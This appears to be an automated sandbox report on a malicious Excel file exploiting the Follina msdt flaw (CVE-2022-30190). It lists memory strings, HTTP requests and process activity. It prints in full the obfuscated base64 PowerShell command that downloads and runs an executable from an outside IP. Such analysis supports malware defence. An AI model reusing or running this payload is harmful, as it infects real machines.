Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://officeapps.live.com
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://onedrive.live.com
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://onedrive.live.com/embed?
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://osi.office.net
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://otelrules.azureedge.net
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://outlook.office.com
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://outlook.office.com/
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://outlook.office365.com
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://outlook.office365.com/
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://pages.store.office.com/review/query
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://powerlift.acompli.net
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectory
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://roaming.edog.
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://settings.outlook.com
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://shell.suite.office.com:1443
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://skyapi.live.net/Activity/
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://staging.cortana.ai
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://store.office.cn/addinstemplate
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://store.office.de/addinstemplate
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://substrate.office.com/search/api/v2/init
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://tasks.office.com
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://web.microsoftstream.com/video/
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://webshell.suite.office.com
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://wus2.contentsync.
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://wus2.pagecontentsync.
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr String found in binary or memory: https://www.odwebp.svc.ms
Source: global traffic HTTP traffic detected: GET /shipping_invc/document.html HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 172.245.119.48Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /870/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 172.245.119.48Connection: Keep-Alive

System Summary
barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: enable Editing and Content from the Yellow bar 18" ~ A above to view locked content. 19" pm 20 2
PE file does not import any functions
Source: DiagPackage.dll.13.dr Static PE information: No import functions for PE file found
Source: DiagPackage.dll.mui.13.dr Static PE information: No import functions for PE file found
Yara signature match
Source: 0000000D.00000002.511470035.0000000000820000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-20
Source: 0000000D.00000002.511764004.0000000000828000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-20
Source: Process Memory Space: msdt.exe PID: 6596, type: MEMORYSTR Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-20
PE file contains strange resources
Source: DiagPackage.dll.13.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: DiagPackage.dll.13.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: DiagPackage.dll.13.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: purchase order.xlsx ReversingLabs: Detection: 17%
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: unknown Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id pcWdiAGNOsTIc -skiP FOrCE /PArAM "It_rEBrowSeforFILe=#AIT IT_LaunchMethod=ContextMenu IT_BrowseForFile=4yt$(IEx($(IEX('[SysTEm.TExt.eNCodIng]'+[CHar]58+[CHAr]58+'UTF8.GeTStRIng([SYstEm.cONveRT]'+[Char]58+[cHAR]58+'FROMBAsE64stRiNg('+[cHaR]34+'U1RvcC1wck9jZVNTIC1Gb3JDZSAtbkFtZSAnbXNkdCc7JFdaID0gYWRkLVR5cEUgLW1FbWJlcmRFZmluSXRJT04gJ1tEbGxJbXBvcnQoInVyTE1vTi5kbEwiLCBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyIEtXTCxzdHJpbmcgcEssc3RyaW5nIGp0Ryx1aW50IEV3LEludFB0ciB6YmcpOycgLU5hbWUgIlFXYiIgLU5hTWVTUGFjZSBtcyAtUGFzc1RocnU7ICRXWjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTE5LjQ4Lzg3MC92YmMuZXhlIiwiJGVOdjpQVUJMSUNcdmJjLmV4ZSIsMCwwKTtzdEFyVC1zTGVFUCgzKTtyVW5kbEwzMi5lWEUgemlwZmxkci5kbGwsUm91dGVUaGVDYWxsICIkRW52OlBVQkxJQ1x2YmMuZXhlIjtTdG9QLVByb2NFU3MgLUZPcmNFIC1uYW1FICdzZGlhZ25ob3N0Jw=='+[cHAr]34+'))'))))ej/../../../../../../../../../../../../.Msi
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\byhngmvt\byhngmvt.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF139.tmp" "c:\Users\user\AppData\Local\Temp\byhngmvt\CSC32F0A3FBBAE2450F8C7268C7C3F4F6C.TMP"
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1fyof3jw\1fyof3jw.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES13B6.tmp" "c:\Users\user\AppData\Local\Temp\1fyof3jw\CSCCF40F4DDD1534C9CB221F9FD50B8FC59.TMP"
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1cq1zudv\1cq1zudv.cmdline
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id pcWdiAGNOsTIc -skiP FOrCE /PArAM "It_rEBrowSeforFILe=#AIT IT_LaunchMethod=ContextMenu IT_BrowseForFile=4yt$(IEx($(IEX('[SysTEm.TExt.eNCodIng]'+[CHar]58+[CHAr]58+'UTF8.GeTStRIng([SYstEm.cONveRT]'+[Char]58+[cHAR]58+'FROMBAsE64stRiNg('+[cHaR]34+'U1RvcC1wck9jZVNTIC1Gb3JDZSAtbkFtZSAnbXNkdCc7JFdaID0gYWRkLVR5cEUgLW1FbWJlcmRFZmluSXRJT04gJ1tEbGxJbXBvcnQoInVyTE1vTi5kbEwiLCBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyIEtXTCxzdHJpbmcgcEssc3RyaW5nIGp0Ryx1aW50IEV3LEludFB0ciB6YmcpOycgLU5hbWUgIlFXYiIgLU5hTWVTUGFjZSBtcyAtUGFzc1RocnU7ICRXWjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTE5LjQ4Lzg3MC92YmMuZXhlIiwiJGVOdjpQVUJMSUNcdmJjLmV4ZSIsMCwwKTtzdEFyVC1zTGVFUCgzKTtyVW5kbEwzMi5lWEUgemlwZmxkci5kbGwsUm91dGVUaGVDYWxsICIkRW52OlBVQkxJQ1x2YmMuZXhlIjtTdG9QLVByb2NFU3MgLUZPcmNFIC1uYW1FICdzZGlhZ25ob3N0Jw=='+[cHAr]34+'))'))))ej/../../../../../../../../../../../../.Msi Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF139.tmp" "c:\Users\user\AppData\Local\Temp\byhngmvt\CSC32F0A3FBBAE2450F8C7268C7C3F4F6C.TMP" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES13B6.tmp" "c:\Users\user\AppData\Local\Temp\1fyof3jw\CSCCF40F4DDD1534C9CB221F9FD50B8FC59.TMP" Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{88d96a05-f192-11d4-a65f-0040963251e5}\InProcServer32 Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\{25D11404-BE86-4B00-8632-AD71AC6E433D} - OProcSessId.dat Jump to behavior
Source: classification engine Classification label: mal68.expl.winXLSX@10/24@0/1
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe File opened: C:\Windows\SysWOW64\MSFTEDIT.DLL Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll Jump to behavior
Compiles C# or VB.Net code
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\byhngmvt\byhngmvt.cmdline
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1fyof3jw\1fyof3jw.cmdline
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1cq1zudv\1cq1zudv.cmdline
Drops PE files
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\byhngmvt\byhngmvt.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\1fyof3jw\1fyof3jw.dll Jump to dropped file
Source: C:\Windows\SysWOW64\msdt.exe File created: C:\Windows\Temp\SDIAG_a15a10f3-1521-4839-a5a3-4e170a5f026c\en-US\DiagPackage.dll.mui Jump to dropped file
Source: C:\Windows\SysWOW64\msdt.exe File created: C:\Windows\Temp\SDIAG_a15a10f3-1521-4839-a5a3-4e170a5f026c\DiagPackage.dll Jump to dropped file
Drops PE files to the windows directory (C:\Windows)
Source: C:\Windows\SysWOW64\msdt.exe File created: C:\Windows\Temp\SDIAG_a15a10f3-1521-4839-a5a3-4e170a5f026c\en-US\DiagPackage.dll.mui Jump to dropped file
Source: C:\Windows\SysWOW64\msdt.exe File created: C:\Windows\Temp\SDIAG_a15a10f3-1521-4839-a5a3-4e170a5f026c\DiagPackage.dll Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
